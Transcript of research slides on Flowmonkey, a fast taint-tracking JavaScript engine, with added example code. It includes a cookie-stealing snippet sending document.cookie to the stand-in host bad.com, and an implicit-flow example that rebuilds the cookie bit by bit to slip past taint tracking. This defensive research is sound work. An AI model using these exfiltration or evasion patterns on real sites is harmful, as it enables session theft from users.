document.cookie ✗ Identity theft: cookie stealing

The same path leaks passwords, credit card numbers and browsing history.

Epidemic of data-stealing JavaScript!

How do we detect data stealing without sacrificing performance?

Outline: Motivation, Dynamic Taint Tracking, Flowmonkey, Future Work & Conclusion

Dynamic taint tracking tracks where a value goes at runtime.

Dynamic taint tracking in three steps:
1. Tag a value with a taint.
2. Propagate taints along with the value.
3. Block tainted values at untrusted sinks.

Example: cookie stealing

    ck = document.cookie;
    data = tmp + ck;
    send("bad.com", data);

1. Inject taints at confidential sources: reading document.cookie yields a tainted value, so ck carries the cookie taint.
2. Propagate taints at assignments, concatenations and the like: tmp (say "cr=" + color) is untainted, but data = tmp + ck inherits the taint of ck.
3. Block taints at untrusted sinks: send("bad.com", data) is refused because data still carries the cookie taint.

Dynamic taint tracking: policies
Cookie protection: cookie -> send() ✗
Password protection: password -> send() ✗
General policy: secret info -> expression ✗

Dynamic taint tracking for JavaScript, prior work:
1. Cross site scripting prevention with dynamic data tainting and static analysis (NDSS '07)
2. Analyzing information flow in JavaScript-based browser extensions (ACSAC '09)
3. An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications (CCS '10)
Reported cost: a 10x to 100x slowdown.

Goal: Make It Fast

Flowmonkey

Flowmonkey is based on JaegerMonkey. Both the interpreter and the JIT engine that execute the source code are modified (marked M on the slide) so that taint-tracking logic is added to them.

Language extensions

__taint(val, t): returns val tagged with taint t (val: the value to be tainted; t: the taint to use).
__taintof(val): returns the taint of val.

    var secret = __taint(34349, 1);
    tmp = secret * 68;
    tmp2 = tmp + "345";
    tmp3 = parseInt(tmp2);
    alert(__taintof(tmp)); // 1 is printed

Implementation: shadow stack. For s * 6 (with s = 5) the bytecode is push s, push 6, mul. The real stack holds the values (5, 6, then the product); the shadow stack holds one taint per slot (s's taint, 6's taint, then the joined taint), so the result of mul carries the join of its operands' taints.

Implementation: shadow properties. For a.fld = secret, the object's real properties store the value of fld and a parallel set of shadow properties stores the taint of fld.

Hybrid approach: a full-fledged taint-tracking interpreter paired with a taint-detecting JIT engine. JIT-compiled code keeps running as long as it doesn't touch a taint; as soon as a taint is detected, execution switches to the interpreter, which does full-fledged taint tracking.
Trade-off: rapid prototyping and fast execution when there are few taints, slow execution when there are many.
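The shadow stack, shadow properties and the fast/tracking hand-off described above, as an added toy model in JavaScript (example code written for this page, not Flowmonkey's source). It also walks through the three steps of the cookie-stealing example: a taint enters at a source, rides through arithmetic, concatenation, parseInt and an object property, and is refused at a third-party send. Assumptions: taints are small bitmasks joined with OR; the opcode names are invented; example.com stands in for the page's own origin, the only trusted send() host.

```javascript
'use strict';
// Added toy model for this page, not Flowmonkey's source. It imitates a shadow
// stack (one taint per real stack slot), shadow properties (one taint per object
// field) and the hybrid scheme: a fast path with no shadow bookkeeping runs until
// an instruction would bring a tainted value onto the stack, then full tracking
// takes over. Taints are bitmasks joined with OR; the opcodes are invented;
// example.com stands in for the page's own origin (assumptions).

const OWN_HOST = 'example.com';

class TaintVM {
  constructor() {
    this.stack = [];                   // real stack: values
    this.shadow = [];                  // shadow stack: taints (tracking mode only)
    this.vars = new Map();             // variable values
    this.varTaint = new Map();         // variable taints
    this.shadowProps = new WeakMap();  // object -> Map(field -> taint)
    this.mode = 'fast';
    this.counts = { fast: 0, tracking: 0 };
    this.sent = [];
    this.blocked = [];
  }

  push(v, t) { this.stack.push(v); if (this.mode === 'tracking') this.shadow.push(t); }
  pop() { const v = this.stack.pop(); return [v, this.mode === 'tracking' ? this.shadow.pop() : 0]; }

  // The only check the fast path makes: would this instruction push a taint?
  introducesTaint([op, arg]) {
    if (op === 'taint') return arg !== 0;
    if (op === 'load') return (this.varTaint.get(arg) || 0) !== 0;
    if (op === 'getprop') {
      const obj = this.stack[this.stack.length - 1];
      return ((this.shadowProps.get(obj) || new Map()).get(arg) || 0) !== 0;
    }
    return false;
  }

  // Hand-off: no taint has reached the stack yet, so every existing slot is clean.
  bailOut() { this.shadow = new Array(this.stack.length).fill(0); this.mode = 'tracking'; }

  step(ins) {
    if (this.mode === 'fast' && this.introducesTaint(ins)) this.bailOut();
    this.counts[this.mode]++;
    const [op, arg] = ins;
    switch (op) {
      case 'push':     this.push(arg, 0); break;
      case 'load':     this.push(this.vars.get(arg), this.varTaint.get(arg) || 0); break;
      case 'store':    { const [v, t] = this.pop(); this.vars.set(arg, v); this.varTaint.set(arg, t); break; }
      case 'add': case 'mul': {        // result taint = join of the operand taints
        const [b, tb] = this.pop(); const [a, ta] = this.pop();
        this.push(op === 'add' ? a + b : a * b, ta | tb); break;
      }
      case 'parseint': { const [v, t] = this.pop(); this.push(parseInt(v, 10), t); break; }
      case 'taint':    { const [v, t] = this.pop(); this.push(v, t | arg); break; }   // __taint(val, t)
      case 'taintof':  { const [, t] = this.pop(); this.push(t, 0); break; }         // __taintof(val)
      case 'newobj':   { const o = {}; this.shadowProps.set(o, new Map()); this.push(o, 0); break; }
      case 'setprop':  { const [v, t] = this.pop(); const [o] = this.pop();           // o.arg = v
                         o[arg] = v; this.shadowProps.get(o).set(arg, t); break; }
      case 'getprop':  { const [o, to] = this.pop();
                         this.push(o[arg], to | (this.shadowProps.get(o).get(arg) || 0)); break; }
      case 'send':     { const [v, t] = this.pop();                                    // sink
                         (t !== 0 && arg !== OWN_HOST ? this.blocked : this.sent).push([arg, v]); break; }
      default: throw new Error('unknown op ' + op);
    }
  }

  run(program) { for (const ins of program) this.step(ins); return this; }
}

// Pure arithmetic, as in a benchmark: never leaves the fast path.
const untainted = new TaintVM().run([
  ['push', 5], ['push', 6], ['mul'], ['store', 's'], ['load', 's'], ['send', OWN_HOST],
]);

// The __taint/__taintof example from the slides, then a cookie-style leak
// through an object property; the first taint forces the hand-off.
const tainted = new TaintVM().run([
  ['push', 34349], ['taint', 1], ['store', 'secret'],            // var secret = __taint(34349, 1)
  ['load', 'secret'], ['push', 68], ['mul'], ['store', 'tmp'],   // tmp = secret * 68
  ['load', 'tmp'], ['push', '345'], ['add'], ['store', 'tmp2'],  // tmp2 = tmp + "345"
  ['load', 'tmp2'], ['parseint'], ['store', 'tmp3'],             // tmp3 = parseInt(tmp2)
  ['load', 'tmp3'], ['taintof'], ['store', 'observed'],          // __taintof(tmp3) -> 1
  ['newobj'], ['store', 'a'],
  ['load', 'a'], ['load', 'tmp3'], ['setprop', 'fld'],           // a.fld = tmp3 (shadow property)
  ['load', 'a'], ['getprop', 'fld'], ['send', 'bad.com'],         // third-party sink: blocked
  ['load', 'a'], ['getprop', 'fld'], ['send', OWN_HOST],          // same origin: allowed
]);
```

Run it with node. The counts reproduce the cost model on the slides: the benchmark-style program executes every instruction on the fast path, while the tainted program spends all but its first instruction in tracking mode once __taint has fired, and the taint survives mul, add, parseInt and the property round-trip to block the send to bad.com.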

Performance on SunSpider: the baseline engine compared with cookie tracking enabled, under the policy that the cookie must not flow to third-party code. (Charts not reproduced in the transcript.)

Demo

Future Work & Conclusion

Future work
Missing flows: implicit flows, timing channels, etc.
Empirical study: to demonstrate the usability of taint tracking.
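What "implicit flows" means for a value-level tracker, as an added example that is not part of the slides. A minimal explicit tracker (a Tainted wrapper plus operations that join taints; constructed here as a stand-in for the same idea, not Flowmonkey's __taint/__taintof) catches the direct cookie leak, but a loop that copies the secret one bit at a time through if/else produces a string built only from literals, which passes the sink check unchanged.

```javascript
'use strict';
// Added example: a value-level taint tracker catches explicit flows but not
// implicit ones. Tainted, concat, charCodeAt and bitSet are constructed for this
// example as stand-ins for engine-provided tainted operations (assumption).

class Tainted {
  constructor(value, taint) { this.value = value; this.taint = taint; }
}
const taintOf = v => (v instanceof Tainted ? v.taint : 0);
const plain = v => (v instanceof Tainted ? v.value : v);

// Explicit propagation: every operation's result carries the join of its operands' taints.
const concat = (a, b) => new Tainted(String(plain(a)) + String(plain(b)), taintOf(a) | taintOf(b));
const charCodeAt = (s, i) => new Tainted(plain(s).charCodeAt(i), taintOf(s));
const bitSet = (n, i) => new Tainted(((plain(n) >> i) & 1) === 1, taintOf(n));

// Sink: a third-party send is blocked if the data carries any taint.
function send(host, data) {
  const thirdParty = host !== 'example.com';       // example.com: page origin (assumed)
  const blocked = thirdParty && taintOf(data) !== 0;
  return { host, blocked, payload: blocked ? null : plain(data) };
}

const COOKIE = new Tainted('sid=abc123', 1);       // constructed stand-in for document.cookie

// 1. Explicit flow: data = tmp + ck; send("bad.com", data). Caught.
function explicitLeak() {
  const data = concat('cr=blue&c=', COOKIE);
  return send('bad.com', data);
}

// 2. Implicit flow: the secret only ever influences which branch runs. Every
//    value written into `copy` is a literal, so nothing tainted reaches the sink.
function implicitLeak() {
  let copy = '';
  const len = plain(COOKIE).length;                // the loop bound is itself an implicit flow
  for (let i = 0; i < len; i++) {
    const code = charCodeAt(COOKIE, i);            // tainted
    let c = 0;
    for (let b = 7; b >= 0; b--) {
      c <<= 1;
      if (plain(bitSet(code, b))) c |= 1;          // branch on a tainted condition, assign a constant
    }
    copy += String.fromCharCode(c);                // untainted reconstruction of the secret
  }
  return { reconstructed: copy, sink: send('bad.com', copy) };
}
```

explicitLeak() is blocked at the sink, while implicitLeak() rebuilds the full cookie and sends it with taint 0. Closing this gap needs control-flow tracking (tainting values assigned under a tainted branch condition), which the slides list under missing flows.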

Conclusions
A fast hybrid taint-tracking engine: the first JIT-enabled taint-tracking engine.
Still many missing parts.
Open questions: can it be made into a protection tool? Can we sacrifice some performance?
